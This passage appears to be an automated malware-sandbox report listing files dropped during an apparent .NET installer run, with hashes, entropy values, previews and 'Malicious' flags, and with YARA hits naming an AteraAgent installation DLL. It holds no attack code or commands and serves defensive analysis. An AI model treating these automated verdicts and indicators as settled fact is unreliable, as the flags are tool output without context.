                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@wOBY.@.....@.....@.....@.....@.....@......&.{A09F8381-88C3-44C4-9DAB-AC44F4F4DB4B}".Microsoft .NET Host - 6.0.32 (x64)..dotnet-host-6.0.32-win-x64.msi.@.....@gA.0.@.....@........&.{6CC46603-A43D-40BF-9045-9949A2B95632}.....@.....@.....@.....@.......@.....@.....@.......@....".Microsoft .NET Host - 6.0.32 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{3AB1371A-161F-5BD9-98C8-F9BF7A103CA5}X.02:\Software\Classes\Installer\Dependencies\Dotnet_CLI_SharedHost_48.3.31210_x64\Version.@.......@.....@.....@......&.{45399BBB-DDA5-4386-A2E9-618FB3C54A18}".C:\Program Files\dotnet\dotnet.exe.@.......@.....@.....@......&.{EA9C3F98-F9B1-5212-8980-CFEAF2B15E0D}B.22:\SOFTWARE\dotnet\Setup\InstalledVersions\x64\sharedhost\Version.@.......@.....@.....@......&.{E4E008C8-57A8-5040-BB34-03024B15B6C5}?.02:\SOFTWARE\dotnet\Setup\InstalledVersions\x64\
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):250736
                                                                                                                                                                                                                                        Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                        MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                        SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                        SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                        SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):250736
                                                                                                                                                                                                                                        Entropy (8bit):6.765155684437659
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:hXiqyhTO8W0iEa8LW0bEC9hvZpC01v+eUKflQnZl+T+J7g6EsNr7wyy/EPzr9XA:hqhy8VKU3hvZUy+ppHEsuB/cBQ
                                                                                                                                                                                                                                        MD5:60E8C139E673B9EB49DC83718278BC88
                                                                                                                                                                                                                                        SHA1:00A3A9CD6D3A9F52628EA09C2E645FE56EE7CD56
                                                                                                                                                                                                                                        SHA-256:B181B6B4D69A53143A97A306919BA1ADBC0B036A48B6D1D41AE7A01E8EF286CB
                                                                                                                                                                                                                                        SHA-512:AC7CB86DBF3B86F00DA7B8A246A6C7EF65A6F1C8705EA07F9B90E494B6239FB9626B55EE872A9B7F16575A60C82E767AF228B8F018D4D7B9F783EFACCCA2B103
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):714
                                                                                                                                                                                                                                        Entropy (8bit):5.4403123077259
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:Eg3b0LBVevIZ+30gBGLyeIp3qj//l30gBi/fNEhHmX/qHXZNDUSEMszVltNn6evL:T0LBVk3tGeee6jV3t/QXkXZIMEVlt16G
                                                                                                                                                                                                                                        MD5:7CDD9C519347B856E05DF0A37AF6ABD8
                                                                                                                                                                                                                                        SHA1:D61C494EF054AD9A41499A5A73E297DA77E57DC1
                                                                                                                                                                                                                                        SHA-256:CFBDDEAE5C6902DFB5B4BCA6F5F1497C5201CC705E05A12948564ED0A02D28CE
                                                                                                                                                                                                                                        SHA-512:FF2FEBE7778B0442486CE9F715E4B134F858B249E506C182A8BDF137EF3F454132F149704D3F8A0C25BD17A33E65682BDA7BC3DA34A48F090B498467D282F913
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:...@IXOS.@.....@xOBY.@.....@.....@.....@.....@.....@......&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}%.Microsoft .NET Runtime - 6.0.32 (x64)!.dotnet-runtime-6.0.32-win-x64.msi.@.....@gA.0.@.....@........&.{81A6B662-3AB0-42DC-AE22-74E8036F80FA}.....@.....@.....@.....@.......@.....@.....@.......@....%.Microsoft .NET Runtime - 6.0.32 (x64)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........RegisterProduct..Registering product..[1]i...0......PublishProduct..Publishing product information.......@.....@.....@......&.{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}Q.C:\ProgramData\Package Cache\{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}v48.128.16743\...@.....@.....@....
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                                                        Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                        MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                        SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                        SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                        SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1538
                                                                                                                                                                                                                                        Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                        MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                        SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                        SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                        SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):184240
                                                                                                                                                                                                                                        Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                        MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                        SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                        SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                        SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):711952
                                                                                                                                                                                                                                        Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                        MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                        SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                        SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                        SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61448
                                                                                                                                                                                                                                        Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                        MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                        SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                        SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                        SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                                                        Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                        MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                        SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                        SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                        SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIA259.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1538
                                                                                                                                                                                                                                        Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                        MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                        SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                        SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                        SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):184240
                                                                                                                                                                                                                                        Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                        MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                        SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                        SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                        SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):711952
                                                                                                                                                                                                                                        Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                        MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                        SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                        SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                        SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61448
                                                                                                                                                                                                                                        Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                        MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                        SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                        SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                        SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):521954
                                                                                                                                                                                                                                        Entropy (8bit):7.356225107100806
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:GnBaimP+DJLxQb6CBCldjCaOIM7PmD8WoKO2qHxf:kG2D3QbCldj1MK/tzG
                                                                                                                                                                                                                                        MD5:88D29734F37BDCFFD202EAFCDD082F9D
                                                                                                                                                                                                                                        SHA1:823B40D05A1CAB06B857ED87451BF683FDD56A5E
                                                                                                                                                                                                                                        SHA-256:87C97269E2B68898BE87B884CD6A21880E6F15336B1194713E12A2DB45F1DCCF
                                                                                                                                                                                                                                        SHA-512:1343ED80DCCF0FA4E7AE837B68926619D734BC52785B586A4F4102D205497D2715F951D9ACACC8C3E5434A94837820493173040DC90FB7339A34B6F3EF0288D0
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):25600
                                                                                                                                                                                                                                        Entropy (8bit):5.009968638752024
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:akuS4rIWmFo967HkYc/4CmvZqVZa9VSlkfO2IROklJhwaHr1LpvTVi:RuVs3bXCmvZqu3u9OiNL1LpvTs
                                                                                                                                                                                                                                        MD5:AA1B9C5C685173FAD2DABEBEB3171F01
                                                                                                                                                                                                                                        SHA1:ED756B1760E563CE888276FF248C734B7DD851FB
                                                                                                                                                                                                                                        SHA-256:E44A6582CD3F84F4255D3C230E0A2C284E0CFFA0CA5E62E4D749E089555494C7
                                                                                                                                                                                                                                        SHA-512:D3BFB4BD7E7FDB7159FBFC14056067C813CE52CDD91E885BDAAC36820B5385FB70077BF58EC434D31A5A48245EB62B6794794618C73FE7953F79A4FC26592334
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\MSIB4E8.tmp-\AlphaControlAgentInstallation.dll, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1538
                                                                                                                                                                                                                                        Entropy (8bit):4.735670966653348
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:2dhmhx0PY6Iee7LfKhT06XWslTh17jJB+aZtG9jDqRp:c0nd5t7q7WsFD7t3tG96n
                                                                                                                                                                                                                                        MD5:BC17E956CDE8DD5425F2B2A68ED919F8
                                                                                                                                                                                                                                        SHA1:5E3736331E9E2F6BF851E3355F31006CCD8CAA99
                                                                                                                                                                                                                                        SHA-256:E4FF538599C2D8E898D7F90CCF74081192D5AFA8040E6B6C180F3AA0F46AD2C5
                                                                                                                                                                                                                                        SHA-512:02090DAF1D5226B33EDAAE80263431A7A5B35A2ECE97F74F494CC138002211E71498D42C260395ED40AEE8E4A40474B395690B8B24E4AEE19F0231DA7377A940
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8" ?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true">.... .. Use supportedRuntime tags to explicitly specify the version(s) of the .NET Framework runtime that.. the custom action should run on. If no versions are specified, the chosen version of the runtime.. will be the "best" match to what Microsoft.Deployment.WindowsInstaller.dll was built against..... WARNING: leaving the version unspecified is dangerous as it introduces a risk of compatibility.. problems with future versions of the .NET Framework runtime. It is highly recommended that you specify.. only the version(s) of the .NET Framework runtime that you have tested against..... Note for .NET Framework v3.0 and v3.5, the runtime version is still v2.0..... In order to enable .NET Framework version 2.0 runtime activation policy, which is to load all assemblies.. by using the latest
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):184240
                                                                                                                                                                                                                                        Entropy (8bit):5.876033362692288
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:BGfZS7hUuK3PcbFeRRLxyR69UgoCaf8+aCnfKlRUjW01KymkO:9zMRLkR6joxfRPW
                                                                                                                                                                                                                                        MD5:1A5CAEA6734FDD07CAA514C3F3FB75DA
                                                                                                                                                                                                                                        SHA1:F070AC0D91BD337D7952ABD1DDF19A737B94510C
                                                                                                                                                                                                                                        SHA-256:CF06D4ED4A8BAF88C82D6C9AE0EFC81C469DE6DA8788AB35F373B350A4B4CDCA
                                                                                                                                                                                                                                        SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):711952
                                                                                                                                                                                                                                        Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                        MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                        SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                        SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                        SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):61448
                                                                                                                                                                                                                                        Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                        MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                        SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                        SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
